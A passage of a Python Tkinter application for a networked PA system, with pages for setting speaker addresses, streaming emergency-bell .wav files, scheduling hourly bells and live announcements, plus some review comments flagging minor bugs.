            if self.set_button1.config('relief')[-1] == 'sunken':
                self.set_button1.config(relief="raised")
                self.s1_on = False
                self.s1_button['state'] = 'disabled'
                self.both_button['state'] = 'disabled'
            else:
                self.set_button1.config(relief="sunken")
                self.s1_on = True
                if self.s2_on is True and self.s1_on is True:
                    self.both_button['state'] = 'normal'
                self.s1_button['state'] = 'normal'

    def toggle_button_2(self):
        """Validate speaker 2's address fields and toggle its 'Set' latch."""
        i1 = ip_input_1.get()
        p1 = port_input_1.get()
        # BUGFIX: same `is` -> `==` literal-comparison fix as toggle_button_1.
        if (i1 == '') and (p1 == 0):
            print("Wrong")
        elif p1 == 0:
            print("wrong")
        elif i1 == '':
            print('WRong')
        else:
            if self.set_button2.config('relief')[-1] == 'sunken':
                self.set_button2.config(relief="raised")
                self.s2_on = False
                self.s2_button['state'] = 'disabled'
                self.both_button['state'] = 'disabled'
            else:
                self.set_button2.config(relief="sunken")
                self.s2_on = True
                if self.s2_on is True and self.s1_on is True:
                    self.both_button['state'] = 'normal'
                self.s2_button['state'] = 'normal'

    def show(self):
        """Re-show this window; return False if it was already destroyed."""
        try:
            self.deiconify()
            return True
        except Exception:
            # Narrowed from a bare except; the window no longer exists.
            return False

    def prove(self):
        # Signals to the caller that this page exists.
        return True

    def backOpt(self):
        """Hide this page and return to the main window."""
        self.withdraw()
        self.master1.show()

    def goto_connect(self):
        """Hide this page and open the connection page."""
        self.withdraw()
        PageFive(self.master1)

    def save_ip(self):
        """Persist speaker 1's address as 'ip,port' into Address.txt."""
        get_ip = open("Address.txt", "w+")
        __ip = ip_input.get()
        __port = port_input.get()
        ip_input.set(__ip)
        port_input.set(__port)
        if __ip is not None and __port is not None:
            add_addr = '{},{}'.format(__ip, __port)
            get_ip.write(add_addr)
            get_ip.close()
        else:
            print("Wrong ip")
#Emergency Alarm
class PageTwo(tk.Toplevel):
    """'Emergency Bell' window.

    Lets the operator pick a .wav file (via a browse dialog, or a combobox
    of previously used sounds persisted in songlist.txt) and stream it to
    the configured speaker through a Client2_Send instance, with
    Send / Pause / Resume / Stop controls and a progress bar.
    """
    def __init__(self, master):
        """Build the window; *master* is the parent page re-shown on Back."""
        self.master2 = master
        tk.Toplevel.__init__(self)
        self.geometry("500x500")
        self.title("Emergency Bell")
        #self.state("zoomed")
        self.frame = tk.Frame(self)
        self.frame.pack(fill="both", expand=True)
        self.frame.configure(background="white")
        self.frame1 = tk.Frame(self.frame)
        self.frame1.configure(background="orange")
        self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
        # name.txt stores the path of the currently selected sound file.
        self.f = "name.txt"
        self.str_1 = tk.StringVar()
        self.str_2 = tk.StringVar()
        self.str_3 = tk.StringVar()
        self.str_4 = tk.StringVar()
        self.done_sending_ = tk.StringVar()
        b1 = tk.Button(self.frame1, text="Browse", command=self.browse_button, fg='black', bg="white", relief='solid', width=11,
                       font=('arial', 11, 'bold'))
        self.b2 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
                            bg='white', relief='solid', width=6, height=1, font=('arial', 10, 'bold'))
        self.b3 = tk.Button(self.frame1, text='Send', command=self.send_file, fg='black',
                            bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
        self.b4 = tk.Button(self.frame1, text='Stop', command=self.stop_send, fg='black',
                            bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
        self.b5 = tk.Button(self.frame1, text='Resume', command=self.resume_send, fg='black',
                            bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
        self.b6 = tk.Button(self.frame1, text='Pause', command=self.pause_send, fg='black',
                            bg='white', relief='solid', width=15, height=1, font=('arial', 15, 'bold'))
        # NOTE(review): this local `b3` shadows nothing harmful (self.b3 is
        # the Send button), but the duplicate name is confusing.
        b3 = tk.Button(self.frame1, text="Exit", command=self.closeOpt, fg='black', bg="white",
                       relief='solid',
                       font=('arial', 10, 'bold'), width='6',
                       height='1')
        l1 = tk.Label(self.frame1, text="EMERGENCY BELL", font=('arial', 20, 'bold'), bg='orange')
        l2 = tk.Label(self.frame1, text="Name:", font=('arial', 12, 'bold'), bg='orange')
        l3 = tk.Label(self.frame1, text="Length:", font=('arial', 12, 'bold'), bg='orange')
        l4 = tk.Label(self.frame1, text="Size:", font=('arial', 12, 'bold'), bg='orange')
        l5 = tk.Label(self.frame1, text="Channels:", font=('arial', 12, 'bold'), bg='orange')
        l6 = tk.Label(self.frame1, text="Framerate:", font=('arial', 12, 'bold'), bg='orange')
        self.progressbar = Progressbar(self.frame1, orient="horizontal", length="350", mode="determinate",variable=progress_var)
        l7_ = tk.Label(self.frame1, text="", font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_1)
        l8_ = tk.Label(self.frame1, text="", font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_2)
        l9_ = tk.Label(self.frame1, text='', font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_3)
        l10_ = tk.Label(self.frame1, text='', font=('arial', 12, 'bold'), bg='orange', textvariable=self.str_4)
        l11_ = tk.Label(self.frame1, text='0%', font=('arial', 12, 'bold'), bg='orange', textvariable=percentage_)
        # l13_ = Label(self, text='Done Sending!', font=('arial', 12, 'bold'), bg='orange', textvariable=None)
        l12_ = tk.Label(self.frame1, text='Sending. . .', font=('arial', 12, 'bold'), bg='orange',
                        textvariable=self.done_sending_)
        path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
        path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
        path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\alarm.gif'
        load_img = Image.open(path1)
        load_img2 = Image.open(path2)
        load_img3 = Image.open(path3)
        wd = 70
        ht = 70
        wd1 = 80
        ht1 = 80
        img_res2 = load_img2.resize((wd,ht), Image.ANTIALIAS)
        img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
        img_res3 = load_img3.resize((wd1, ht1), Image.ANTIALIAS)
        get_img = ImageTk.PhotoImage(img_res1)
        img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
        get_img2 = ImageTk.PhotoImage(img_res2)
        img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
        get_img3 = ImageTk.PhotoImage(img_res3)
        img_logo3 = tk.Label(self.frame1, image=get_img3, bg="orange")
        # Keep references on the labels so the PhotoImages are not GC'd.
        img_logo.image = get_img
        img_logo.place(relx=0.08, rely=0.18, anchor="w")
        img_logo2.image = get_img2
        img_logo2.place(relx=0.73, rely=0.17, anchor="w")
        img_logo3.image = get_img3
        img_logo3.place(relx=0.40, rely=0.17, anchor="w")
        b1.place(relx=0.66, rely=0.3, anchor="w")
        self.b2.place(x=0, y=0)
        self.b3.place(relx=0.08, rely=0.75, anchor="w")
        self.b4.place(relx=0.50, rely=0.75, anchor="w")
        self.b5.place(relx=0.08, rely=0.85, anchor="w")
        self.b6.place(relx=0.50, rely=0.85, anchor="w")
        b3.place(x=2, relx=0.88, rely=0)
        l1.place(relx=0.5, rely=0.05, anchor="center")
        l2.place(relx=0.08, rely=0.3, anchor="w")
        l3.place(relx=0.08, rely=0.4, anchor="w")
        l4.place(relx=0.08, rely=0.5, anchor="w")
        l5.place(relx=0.45, rely=0.4, anchor="w")
        l6.place(relx=0.45, rely=0.5, anchor="w")
        self.progressbar.place(relx=0.08, rely=0.6, anchor="w")
        l7_.place(relx=0.22, rely=0.4, anchor="w")
        l8_.place(relx=0.22, rely=0.5, anchor="w")
        l9_.place(relx=0.63, rely=0.4, anchor="w")
        l10_.place(relx=0.63, rely=0.5, anchor="w")
        l11_.place(relx=0.81, rely=0.6, anchor="w")
        # l13_.place(x=40, y=200)
        l12_.place(relx=0.08, rely=0.66, anchor="w")
        # Stop/Resume/Pause only make sense while a send is in progress.
        self.b4["state"] = "disabled"
        self.b5["state"] = "disabled"
        self.b6["state"] = "disabled"
        percentage_.set("0%")
        # Map of sound name -> file path, persisted as JSON in songlist.txt.
        self.sound_list = {}
        _songlist = "songlist.txt"
        if os.path.exists(_songlist):
            sound = open(_songlist, "r+")
            js_song = sound.read()
            values = json.loads(js_song)
            if values is not None:
                self.sound_list = {**self.sound_list, **values}
                values = list(self.sound_list.keys())
            else:
                values = ''
        else:
            values = ''
        self.combo = Combobox(self.frame1, height="10", width="30", values=values)
        self.combo.place(relx=0.22, rely=0.3, anchor="w")
        self.combo.bind("<<ComboboxSelected>>", self.on_select)
        # NOTE(review): `is not ''` is an identity test on a str literal
        # (SyntaxWarning on CPython 3.8+); equality is what is meant here.
        if values is not '' and values is not None:
            self.combo.current(0)
        self.stop1 = False
        self.pause2 = False
        self.resume1 = False
        self.done__ = False
        # Frames per packet; used to derive the progress-bar maximum.
        self.chunks = 1000
        # self.ip = '127.0.0.1'
        # self.port = 12345
        self.ip = ip_input.get()
        self.port = port_input.get()
        self.client2 = Client2_Send(ip=self.ip, port=self.port)
    def on_select(self, event=None):
        """Combobox selection: show the file's details, remember its path."""
        x = event.widget.get()
        print(x)
        locs = self.sound_list[x]
        self.change_text(locs)
        fw = open(self.f, "w+")
        fw.write(locs)
        fw.close()
    def closeOpt(self):
        """Exit button: ask the main window to quit the application."""
        self.master2.quiting()
    def backOpt(self):
        """Back button: close this window and re-show the parent page."""
        self.destroy()
        self.master2.show()
    def sending_frame(self):
        """Animate the 'Sending...' label on a daemon thread until done__."""
        def _send_label():
            self.done__ = False
            while True:
                if self.done__:
                    break
                self.done_sending_.set("Sending")
                time.sleep(1)
                if self.done__:
                    break
                self.done_sending_.set("Sending.")
                time.sleep(1)
                if self.done__:
                    break
                self.done_sending_.set("Sending. .")
                time.sleep(1)
                if self.done__:
                    break
                self.done_sending_.set("Sending. . .")
                time.sleep(1)
                if self.done__:
                    break
        t1 = threading.Thread(target=_send_label, daemon=True)
        t1.start()
    def send_file(self):
        """Send button: stream the selected .wav on a daemon thread, driving
        the progress bar and the button states."""
        def __progress():
            # name.txt holds the path written by browse_button/on_select.
            file = open('name.txt', 'r+')
            file = file.read()
            wf = wave.open(file, 'rb')
            size = wf.getnframes()
            num_packets = int((size/self.chunks)+1)
            self.resume1 = False
            self.stop1 = False
            self.pause2 = False
            self.b2["state"] = "disabled"
            self.b3["state"] = "disabled"
            self.b4["state"] = "normal"
            self.b5["state"] = "disabled"
            self.b6["state"] = "normal"
            # total = 1023450
            # sps = 4098
            self.progressbar['maximum'] = num_packets
            self.sending_frame()
            ###----
            # Blocks until the whole file has been streamed (or stopped).
            self.client2.running_all()
            ###----
            self.done__ = True
            time.sleep(1)
            self.done_sending_.set("Done sending!")
            percentage_.set("0%")
            self.progressbar.stop()
            progress_var.set(0)
            self.b2["state"] = "normal"
            self.b3["state"] = "normal"
            self.b4["state"] = "disabled"
            self.b5["state"] = "disabled"
            self.b6["state"] = "disabled"
            time.sleep(1)
            self.done_sending_.set("Select a sound to send")
        t1 = threading.Thread(target=__progress, daemon=True)
        t1.start()
    def resume_send(self):
        """Resume a paused transmission."""
        self.done__ = False
        self.resume1 = True
        self.client2.waveclient.resume_play()
        self.b5["state"] = "disabled"
        self.b6["state"] = "normal"
    def stop_send(self):
        """Stop the transmission and reset the UI (on a daemon thread)."""
        def stop_send_():
            self.stop1 = True
            self.done__ = True
            self.client2.waveclient.stop_play()
            time.sleep(1)
            self.done_sending_.set("Select a sound to send.")
            percentage_.set("0%")
            self.progressbar.stop()
            self.b2["state"] = "normal"
            self.b3["state"] = "normal"
            self.b4["state"] = "disabled"
            self.b5["state"] = "disabled"
            self.b6["state"] = "disabled"
        t1 = threading.Thread(target=stop_send_, daemon=True)
        t1.start()
    def pause_send(self):
        """Pause the transmission (on a daemon thread)."""
        def pause_send_():
            self.client2.waveclient.pause_play()
            self.pause2 = True
            self.done__ = True
            self.b5["state"] = "normal"
            self.b6["state"] = "disabled"
            time.sleep(1)
            self.done_sending_.set("Sending is paused.")
        t1 = threading.Thread(target=pause_send_, daemon=True)
        t1.start()
    def browse_button(self):
        """Browse button: pick a .wav, remember it in name.txt/songlist.txt,
        and show its details (on a daemon thread)."""
        def browse_button_():
            filename1 = filedialog.askopenfilename(initialdir="/", title="Choose a file",
                                                   filetypes=(("Sound files", ".wav"), ("All files", "*.*")))
            name1 = os.path.basename(filename1)
            add_name_1 = filename1 # f"Filename: {name1} \nPath: {filename1}"
            fw = open(self.f, "w+")
            fw.write(add_name_1)
            fw.close()
            # NOTE(review): identity comparison with '' -- equality intended.
            if filename1 is not '' and name1 is not '':
                if name1 not in self.sound_list:
                    self.sound_list[name1] = filename1
                self.combo.set(name1)
                self.combo['values'] = list(self.sound_list.keys())
                self.combo.current()
                save_song = open("songlist.txt", "w+")
                str_js = json.dumps(self.sound_list)
                save_song.write(str_js)
                save_song.close()
                self.change_text(filename1)
        t1 = threading.Thread(target=browse_button_, daemon=True)
        t1.start()
    def change_text(self, filename1):
        """Fill the Length/Size/Channels/Framerate labels for *filename1*
        (on a daemon thread)."""
        def change_text_(filename1):
            wf = wave.open(filename1, 'rb')
            size = os.path.getsize(filename1)
            (source_rate, source_sig) = wav.read(filename1)
            duration_seconds = len(source_sig) / float(source_rate)
            size = size / 1000
            size1 = size / 1000
            size1 = round(size1, 1)
            size = int(size)
            # A KB figure with >= 6 digits is better displayed in MB.
            if len(str(size)) >= 6:
                size = ''.join(str(size1) + " MB")
            else:
                size = ''.join(str(size) + " KB")
            chn = wf.getnchannels()
            fr = wf.getframerate()
            fr = ''.join(str(fr) + " Hz")
            duration_seconds = "".join(str(int(duration_seconds)) + " sec")
            if duration_seconds and size and chn and fr:
                self.str_1.set(duration_seconds)
                self.str_2.set(size)
                self.str_3.set(chn)
                self.str_4.set(fr)
        t1 = threading.Thread(target=change_text_, args=(filename1,), daemon=True)
        t1.start()
# Hourly Bell page
class PageThree(tk.Toplevel):
    """'Hourly Bell' window.

    Schedules a chosen .wav file to be sent repeatedly between a start and
    an end time ("HH:MM:SS" entries with input masking) at a fixed interval
    in minutes, via Client3_Send.  Scheduled entries are listed in a small
    treeview log and persisted sound choices live in sound.txt.
    """
    def __init__(self, master):
        """Build the window; *master* is the parent page re-shown on Back."""
        self.master2 = master
        tk.Toplevel.__init__(self)
        self.geometry("500x500")
        # NOTE(review): title says "Emergency Bell" although this is the
        # hourly-bell page -- looks like a copy/paste leftover; confirm.
        self.title("Emergency Bell")
        #self.state("zoomed")
        self.start_var = tk.StringVar(value = '')
        self.end_var = tk.StringVar(value = '')
        self.interval_var = tk.IntVar(value=0)
        self.song_var = tk.StringVar()
        self.song_invalid = False
        # Validation callback args: %d action, %s current text, %S inserted.
        vcmd = (self.register(self.onValidate), '%d', '%s', '%S')
        self.frame = tk.Frame(self)
        self.frame.pack(fill="both", expand=True)
        self.frame.configure(background="white")
        self.frame1 = tk.Frame(self.frame)
        self.frame1.configure(background="orange")
        self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
        Lh0 = tk.Label(self.frame1, text='HOURLY BELL', font=('arial', 20, 'bold'), bg='orange')
        Lh1 = tk.Label(self.frame1, text='Time Start:', font=('arial', 20, 'bold'), bg='orange')
        Lh2 = tk.Label(self.frame1, text='Time End :', font=('arial', 20, 'bold'), bg='orange')
        Lh3 = tk.Label(self.frame1, text='Interval:', font=('arial', 20, 'bold'), bg='orange')
        Lh4 = tk.Label(self.frame1, text='Operation Logs:', font=('arial', 12, 'bold'), bg='orange')
        Lh5 = tk.Label(self.frame1, text='- in minutes', font=('arial', 8, 'bold'), bg='orange')
        self.Eh1 = tk.Entry(self.frame1, width=14, font=('arial', 12, 'bold'), validate='key', validatecommand= vcmd,bd=5, justify = 'center', textvariable =self.start_var)
        self.Eh2 = tk.Entry(self.frame1, width=14, font=('arial', 12, 'bold'), validate='key', validatecommand= vcmd, bd=5, justify = 'center', textvariable =self.end_var)
        self.Eh3 = tk.Entry(self.frame1, width=14, font=('arial', 12, 'bold') ,bd=5, justify = 'center', textvariable =self.interval_var)
        hbbrowse = tk.Button(self.frame1, text="Browse", command=self.browse_button, fg='black', bg="white", relief='solid', width=10,
                             font=('arial', 12, 'bold'), height=2)
        set_button2 = tk.Button(self.frame1, text='Set', command=self.set_button, fg='black',
                                bg='white', relief='solid', width=10, height=2,
                                font=('arial', 12, 'bold'))
        self.b1 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
                            bg='white', relief='solid', width=6, height=1, font=('arial', 10, 'bold'))
        self.b2 = tk.Button(self.frame1, text='Delete\nLog', command=self.delete, fg='black',
                            bg='white', relief='solid', width=5, font=('arial', 8, 'bold'))
        self.clock = tk.Label(self.frame1, font=('arial', 10, 'bold'), fg='black', bg='white', width=12)
        path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
        path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
        path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\bell.gif'
        load_img = Image.open(path1)
        load_img2 = Image.open(path2)
        load_img3 = Image.open(path3)
        wd = 70
        ht = 70
        wd1 = 80
        ht1 = 80
        img_res2 = load_img2.resize((wd, ht), Image.ANTIALIAS)
        img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
        img_res3 = load_img3.resize((wd, ht), Image.ANTIALIAS)
        get_img = ImageTk.PhotoImage(img_res1)
        img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
        get_img2 = ImageTk.PhotoImage(img_res2)
        img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
        get_img3 = ImageTk.PhotoImage(img_res3)
        img_logo3 = tk.Label(self.frame1, image=get_img3, bg='orange')
        # Keep references on the labels so the PhotoImages are not GC'd.
        img_logo.image = get_img
        img_logo2.image = get_img2
        img_logo3.image = get_img3
        Lh0.place(x=160, y=10)
        Lh1.place(relx=0.20, rely=0.35, anchor='w')
        Lh2.place(relx=0.20, rely=0.45, anchor='w')
        Lh3.place(relx=0.20, rely=0.55, anchor='w')
        Lh4.place(relx=0.05, rely=0.75, anchor='w')
        Lh5.place(relx=0.20, rely=0.59, anchor='w')
        self.Eh1.place(relx=0.55, rely=0.35, anchor='w')
        self.Eh2.place(relx=0.55, rely=0.45, anchor='w')
        self.Eh3.place(relx=0.55, rely=0.55, anchor='w')
        hbbrowse.place(relx=0.25, rely=0.67, anchor='w')
        set_button2.place(relx=0.55, rely=0.67, anchor='w')
        img_logo.place(relx=0.1, rely=0.18, anchor="w")
        img_logo2.place(relx=0.73, rely=0.17, anchor="w")
        img_logo3.place(relx=0.42, rely=0.17, anchor="w")
        self.b1.place(x=0, y=0)
        self.b2.place(relx=0.86, rely=0.85, anchor="w")
        self.clock.place(relx=0.5, rely=0.26, anchor='n')
        # Treeview column headers for the schedule log.
        self.car_header = [' Filename ', ' Time Start ', ' Time End ', ' Interval(-min.) ',' Active ']
        self.car_list = []
        # Map of sound name -> file path, persisted as JSON in sound.txt.
        self.pick_sound = {}
        if os.path.exists('sound.txt'):
            read_sound = open('sound.txt', 'r+')
            file0 = read_sound.read()
            file0 = json.loads(file0)
        else:
            file0 = {}
        self.pick_sound = {**self.pick_sound, **file0}
        self.del_logs = False
        self._setup_widgets()
        self.show_clk()
        ip = ip_input.get()
        port = port_input.get()
        #ip = '127.0.0.1'
        #port = 12345
        self.client3 = Client3_Send(ip=ip, port=port)
        self.Eh1.bind('<KeyRelease>', self.timemask)
        self.Eh2.bind('<KeyRelease>', self.timemask)
    def onValidate(self, d, s, S):
        """Entry key-validator for the HH:MM:SS fields.

        d is the action code ("0" = delete, always allowed), s the text
        before the edit, S the inserted text.  Returns False (and beeps)
        when the edit would break the time mask.
        """
        if d == "0":
            return True
        # Allow only digit, ":" and check the length of the string
        if ((S == ":" and len(s) != 2 and len(s) != 5 ) or (not S.isdigit() and
            S != ":") or (len(s) == 3 and int(S) > 5) or (len(s) == 6 and int(S) > 5) or len(s) > 7):
            self.bell()
            return False
        return True
    def timemask(self, event):
        """KeyRelease handler: auto-insert the ':' separators while typing."""
        s = event.widget
        # if delete a char do return ok or delete the char ":" and the previous number
        if len(s.get()) == 2 and event.keysym=="BackSpace":
            s.delete(len(s.get())-1, tk.END)
        if event.keysym=="BackSpace":
            return
        # check the hour format and add : between hours and minutes
        if len(s.get()) == 1 and int(s.get()) > 2:
            s.insert(0, "0")
            s.insert("end", ":")
        elif len(s.get()) == 2 and int(s.get()) < 24:
            s.insert(2, ":")
        elif len(s.get()) >= 2 and s.get()[2:3] != ":":
            self.bell()
            s.delete(1, tk.END)
        elif len(s.get()) == 5 and int(s.get()[3:5]) < 60:
            s.insert(5, ":")
        elif len(s.get()) >= 5 and s.get()[5:6] != ":":
            self.bell()
            s.delete(4, tk.END)
    def browse_button(self):
        """Browse button: pick a .wav and persist the choice (daemon thread)."""
        def browse_button_():
            filename = filedialog.askopenfilename(initialdir="/", title="Choose a file",
                                                  filetypes=(("Sound files", ".wav"), ("All files", "*.*")))
            name = os.path.basename(filename)
            add_name_ = filename # f"Filename: {name1} \nPath: {filename1}"
            fw = open('sound loc.txt', "w+")
            fw.write(add_name_)
            fw.close()
            item_source.set(add_name_)
            # NOTE(review): identity comparison with '' -- equality intended.
            if filename is not '' and name is not '':
                if name not in self.pick_sound:
                    self.pick_sound[name] = filename
                save_sound = open('sound.txt', 'w+')
                str_sound = json.dumps(self.pick_sound)
                save_sound.write(str_sound)
                save_sound.close()
                self.song_var.set(name)
        t1 = threading.Thread(target=browse_button_, daemon=True)
        t1.start()
    def set_button(self):
        """Set button: validate the fields, start the timers, log the entry.

        Requires a selected song, non-zero times/interval, "HH:MM:SS"
        format, start < end, and at least one interval fitting in the span.
        """
        start_time = self.start_var.get()
        end_time = self.end_var.get()
        interval1 = self.interval_var.get()
        # Interval is entered in minutes; the scheduler works in seconds.
        interval = int(interval1*60)
        active = 'Yes'
        song = self.song_var.get()
        if song is not None and song !='':
            self.song_invalid = False
        else: self.song_invalid = True
        if not self.song_invalid:
            if (start_time != '00:00:00') and (end_time != '00:00:00') and (interval != 0):
                song_load_1 = song
                if (len(start_time) == 8) and (len(end_time) == 8):
                    parts = start_time.split(':')
                    parts_2 = end_time.split(':')
                    # Convert HH:MM:SS to seconds since midnight.
                    s_time = int(parts[0])*(60*60) + int(parts[1])*60 + int(parts[2])
                    e_time = int(parts_2[0])*(60*60) + int(parts_2[1])*60 + int(parts_2[2])
                    ss = int(s_time)
                    ee = int(e_time)
                    ii = int(interval)
                    print(ss, ee, ii)
                    if (ss < ee) and (ss+ii<=ee):
                        # `add` (minutes) is displayed; `add_1` (seconds) is scheduled.
                        add = (song_load_1, start_time, end_time, interval1, active)
                        add_1 = (song_load_1, start_time, end_time, interval, active)
                        if add not in self.car_list:
                            jso_n = json.dumps(add_1)
                            self.start_timing(jso_n)
                            self.car_list.append(add)
                            self.tree.insert('', 'end', values=add)
                            for ix, val in enumerate(add):
                                col_w = tkFont.Font().measure(val)
                                if self.tree.column(self.car_header[ix],width=None)<col_w:
                                    self.tree.column(self.car_header[ix], width=col_w)
    def start_timing(self, package,):
        """Unpack a JSON-encoded schedule tuple and start it if active."""
        msg = json.loads(package)
        self.msg = msg
        audio = msg[0]
        st = msg[1]
        et = msg[2]
        int1 = msg[3]
        active_ = msg[4]
        if active_ == 'Yes':
            self.go_timing(st,et,int1,audio)
    def go_timing(self, st, et, ti, src):
        """Spawn one waiting thread per firing time between st and et,
        every ti seconds; the last firing also flips the log entry to 'No'."""
        new_st = st.split(':')
        new_et = et.split(':')
        time_st = int(new_st[0])*(60*60) + int(new_st[1])*60 + int(new_st[2])
        time_et = int(new_et[0])*(60*60) + int(new_et[1])*60 + int(new_et[2])
        get_item = []
        for i in range(time_st, time_et, ti):
            get_item.append(i)
        last = get_item.pop()
        st = time.strftime('%H:%M:%S', time.gmtime(last))
        for i in range(time_st, time_et, ti):
            st = time.strftime('%H:%M:%S', time.gmtime(i))
            if i == last:
                t1 = threading.Thread(target=self.start_TIME_last, args=(st,et,src,), daemon=True)
                t1.start()
            else:
                t =threading.Thread(target=self.start_TIME, args=(st,src,), daemon=True)
                t.start()
    def start_TIME(self, time1, src):
        """Busy-wait (0.5s polls) until wall-clock matches time1, then send src."""
        while True:
            if(time1 == time.strftime('%H:%M:%S')):
                self.client3.running_all(src)
                break
            time.sleep(0.5)
    def start_TIME_last(self, time1,t1, src):
        """Like start_TIME, but afterwards marks the matching log row inactive.

        t1 is the schedule's end-time string used to find the row.
        """
        while True:
            if(time1 == time.strftime('%H:%M:%S')):
                self.client3.running_all(src)
                break
            time.sleep(0.5)
        x = self.tree.get_children()
        for i in x:
            val = self.tree.item(i)['values']
            if t1 in val:
                val.pop()
                add = 'No'
                val.append(add)
                self.tree.item(i, values=val)
    def show_clk(self):
        """Refresh the on-screen clock once a second via `after`."""
        timenow = time.strftime('%H:%M:%S %p')
        self.clock['text'] = timenow
        #self.clock.config(text=timer)
        self.clock.after(1000, self.show_clk)
    def backOpt(self):
        """Back button: close this window and re-show the parent page."""
        self.destroy()
        self.master2.show()
    def _setup_widgets(self):
        """Build the schedule-log treeview with dual scrollbars."""
        container = ttk.Frame(self.frame1)
        container.place(relx=0.05, rely=0.88, anchor='w')
        # create a treeview with dual scrollbars
        self.tree = ttk.Treeview(self.frame1,columns=self.car_header, show="headings", height=3)
        vsb = ttk.Scrollbar(container ,orient="vertical",
                            command=self.tree.yview)
        hsb = ttk.Scrollbar(container,orient="horizontal",
                            command=self.tree.xview)
        self.tree.configure(yscrollcommand=vsb.set,
                            xscrollcommand=hsb.set)
        self.tree.grid(column=0, row=0, sticky='nsew', in_=container)
        self.tree.bind("<<TreeviewSelect>>", self.on_select)
        vsb.grid(column=1, row=0, sticky='ns', in_=container)
        hsb.grid(column=0, row=1, sticky='ew', in_=container)
        container.grid_columnconfigure(0, weight=1)
        container.grid_rowconfigure(0, weight=1)
        for col in self.car_header:
            self.tree.heading(col, text=col.title(),
                              command=lambda c=col: self.sortby(self.tree, c, 0))
            # adjust the column's width to the header string
            self.tree.column(col,
                             width=tkFont.Font().measure(col.title()))
    def sortby(self, tree, col, descending):
        """sort tree contents when a column header is clicked on"""
        # grab values to sort
        data = [(tree.set(child, col), child) \
            for child in tree.get_children('')]
        # if the data to be sorted is numeric change to float
        #data = change_numeric(data)
        # now sort the data in place
        data.sort(reverse=descending)
        for ix, item in enumerate(data):
            tree.move(item[1], '', ix)
        # switch the heading so it will sort in the opposite direction
        tree.heading(col, command=lambda col=col: self.sortby(tree, col, \
            int(not descending)))
    def on_select(self, event=None):
        """Remember the treeview selection so Delete Log can act on it."""
        self.select = event.widget.selection()
        if self.select:
            self.del_logs = True
    def delete(self):
        """Delete Log button: remove the selected rows from the treeview."""
        if self.del_logs:
            if self.select != None and self.select !='':
                for i in self.select:
                    x = self.tree.item(i)['values']
                    self.tree.delete(i)
            self.del_logs = False
# Live Announcement page
class PageFour(tk.Toplevel):
    """'Live Announcement' window.

    Streams live microphone audio to the configured speaker(s) through a
    Client_Send instance and shows the elapsed broadcast time.

    Bug fixes vs. the original: ``self._job`` and ``self.client`` were only
    created inside ``record_time``/``record_time2``, so clicking Stop
    before Play raised AttributeError; both are now initialised in
    ``__init__`` and ``stop_button`` guards the missing-client case.
    """
    def __init__(self, master):
        """Build the window; *master* is the parent page re-shown on Back."""
        self.master2 = master
        tk.Toplevel.__init__(self)
        self.geometry("500x500")
        self.title("Emergency Bell")
        #self.state("zoomed")
        # Pending `after` timer handle and streaming client; must exist
        # before stop_button/cancel_ can run.
        self._job = None
        self.client = None
        self.frame = tk.Frame(self)
        self.frame.pack(fill="both", expand=True)
        self.frame.configure(background="white")
        self.frame1 = tk.Frame(self.frame)
        self.frame1.configure(background="orange")
        self.frame1.place(relx=0.5, rely=0.5, anchor="center", height=500, width=500)
        b1 = tk.Button(self.frame1, text='Back', command=self.backOpt, fg='black',
                       bg='white', relief='solid', width=6, height=1,
                       font=('arial', 10, 'bold'))
        self.b2 = tk.Button(self.frame1,text='Play', command=lambda: self.record_time(0), fg='black',
                            bg='white', relief='solid', width=15, height=2,
                            font=('arial', 10, 'bold'))
        self.b3 = tk.Button(self.frame1,text='Stop', command=self.stop_button, fg='black',
                            bg='white', relief='solid', width=15, height=2,
                            font=('arial', 10, 'bold'))
        Lh0 = tk.Label(self.frame1, text='LIVE ANNOUNCEMENT', font=('arial', 20, 'bold'), bg='orange')
        Lh1 = tk.Label(self.frame1, text='Time Elapsed:', font=('arial', 20, 'bold'), bg='orange')
        self.Lh2 = tk.Label(self.frame1, text='00:00:00', font=('arial', 20, 'bold'), bg='orange')
        path1 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\logo-final.png'
        path2 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\elector_logo.gif'
        path3 = os.path.dirname(os.path.realpath(__file__))+'\\assets\\mic.gif'
        load_img = Image.open(path1)
        load_img2 = Image.open(path2)
        load_img3 = Image.open(path3)
        wd = 70
        ht = 70
        wd1 = 80
        ht1 = 80
        img_res2 = load_img2.resize((wd, ht), Image.ANTIALIAS)
        img_res1 = load_img.resize((wd1, ht1), Image.ANTIALIAS)
        img_res3 = load_img3 #load_img3.resize((wd, ht), Image.ANTIALIAS)
        get_img = ImageTk.PhotoImage(img_res1)
        img_logo = tk.Label(self.frame1, image=get_img, bg="orange")
        get_img2 = ImageTk.PhotoImage(img_res2)
        img_logo2 = tk.Label(self.frame1, image=get_img2, bg="orange")
        get_img3 = ImageTk.PhotoImage(img_res3)
        img_logo3 = tk.Label(self.frame1, image=get_img3, bg='orange')
        # Keep references on the labels so the PhotoImages are not GC'd.
        img_logo.image = get_img
        img_logo2.image = get_img2
        img_logo3.image = get_img3
        b1.place(x=0, y=0)
        self.b2.place(relx=.2, rely=0.6, anchor='w')
